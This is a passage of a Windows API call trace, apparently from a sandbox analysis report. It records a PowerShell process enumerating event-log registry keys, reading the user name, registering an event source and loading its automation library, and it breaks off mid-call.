RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x31c) returned 0x0 [0027.076] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.076] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x32c) returned 0x0 [0027.076] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.076] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x330) returned 0x0 [0027.077] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.077] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x334) returned 0x0 [0027.077] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.077] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x338) returned 0x0 [0027.077] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.077] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x33c) returned 0x0 [0027.077] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.077] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x5 [0027.117] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x340) returned 0x0 [0027.117] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x0) returned 0x2 [0027.117] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x344) returned 0x0 [0027.117] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce408 | out: phkResult=0x1ce408*=0x348) returned 0x0 [0027.117] RegCloseKey (hKey=0x348) returned 0x0 [0027.117] RegCloseKey (hKey=0x300) returned 0x0 [0027.118] RegCloseKey (hKey=0x344) returned 0x0 [0027.127] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.128] GetLastError () returned 0x3 [0027.128] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3bc | out: phkResult=0x1ce3bc*=0x34c) returned 0x0 [0027.170] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ce424, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce420, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ce424*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce420*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.170] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.170] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.170] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.171] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x350) returned 0x0 [0027.171] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.171] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x354) returned 0x0 [0027.172] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.172] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x358) returned 0x0 [0027.172] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.172] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x35c) returned 0x0 [0027.172] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.172] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x360) returned 0x0 [0027.172] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.172] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x364) returned 0x0 [0027.172] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.172] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x5 [0027.176] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x368) returned 0x0 [0027.176] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.176] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x36c) returned 0x0 [0027.176] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x370) returned 0x0 [0027.176] RegCloseKey (hKey=0x370) returned 0x0 [0027.176] RegCloseKey (hKey=0x34c) returned 0x0 [0027.176] RegCloseKey (hKey=0x36c) returned 0x0 [0027.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3bc | out: phkResult=0x1ce3bc*=0x36c) returned 0x0 [0027.177] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ce424, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce420, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ce424*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce420*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.177] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.178] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x2b64c0, lpcchName=0x1ce440, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ce440, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.178] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x34c) returned 0x0 [0027.178] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.178] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x370) returned 0x0 [0027.178] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.178] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x374) returned 0x0 [0027.178] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.178] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x378) returned 0x0 [0027.179] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.179] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x37c) returned 0x0 [0027.179] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.179] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x380) returned 0x0 [0027.179] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.179] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x5 [0027.181] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x384) returned 0x0 [0027.181] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x0) returned 0x2 [0027.181] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x388) returned 0x0 [0027.181] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3ec | out: phkResult=0x1ce3ec*=0x38c) returned 0x0 [0027.181] RegCloseKey (hKey=0x38c) returned 0x0 [0027.181] RegCloseKey (hKey=0x36c) returned 0x0 [0027.181] RegCloseKey (hKey=0x388) returned 0x0 [0027.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3b0 | out: phkResult=0x1ce3b0*=0x388) returned 0x0 [0027.181] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ce418, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce414, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ce418*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce414*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.181] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x2b64c0, lpcchName=0x1ce434, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ce434, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.182] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x36c) returned 0x0 [0027.182] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.182] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x38c) returned 0x0 [0027.182] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.182] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x390) returned 0x0 [0027.182] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.182] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x394) returned 0x0 [0027.182] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.182] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x398) returned 0x0 [0027.183] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.183] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x39c) returned 0x0 [0027.183] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.183] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x5 [0027.184] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x3a0) returned 0x0 [0027.184] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x0) returned 0x2 [0027.184] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x3a4) returned 0x0 [0027.184] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3e0 | out: phkResult=0x1ce3e0*=0x3a8) returned 0x0 [0027.184] RegCloseKey (hKey=0x3a8) returned 0x0 [0027.184] RegCloseKey (hKey=0x388) returned 0x0 [0027.184] RegCloseKey (hKey=0x3a4) returned 0x0 [0027.187] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4350004 [0027.189] GetLastError () returned 0x0 [0027.189] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28884dc*="WSMan", lpRawData=0x2888384) returned 1 [0027.194] GetLastError () returned 0x0 [0027.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.194] GetLastError () returned 0xcb [0027.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.194] GetLastError () returned 0xcb [0027.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.194] GetLastError () returned 0xcb [0027.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.195] GetLastError () returned 0xcb [0027.195] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.195] GetLastError () returned 0xcb [0027.195] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.195] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, 